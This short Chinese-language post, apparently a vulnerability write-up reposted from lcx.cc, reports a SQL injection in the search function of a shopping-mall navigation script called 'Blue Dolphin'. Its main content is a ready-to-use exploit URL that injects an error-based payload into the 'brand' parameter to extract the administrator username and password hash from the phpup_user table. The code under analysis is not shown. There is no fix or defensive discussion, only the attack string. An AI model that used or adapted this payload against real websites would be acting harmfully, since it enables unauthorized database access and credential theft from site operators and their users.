看代码
Index.class.php: …若干……… |
test
exp:
http://127.0.0.1/index.php?act=search&keyword=1&brand=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,0x27,phpup_user.username,0x27,0x7e,phpup_user.pwd)%20from%20phpup_user%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1/*
留言评论(旧系统):
文章来源于lcx.cc:蓝海豚商城导航注入漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论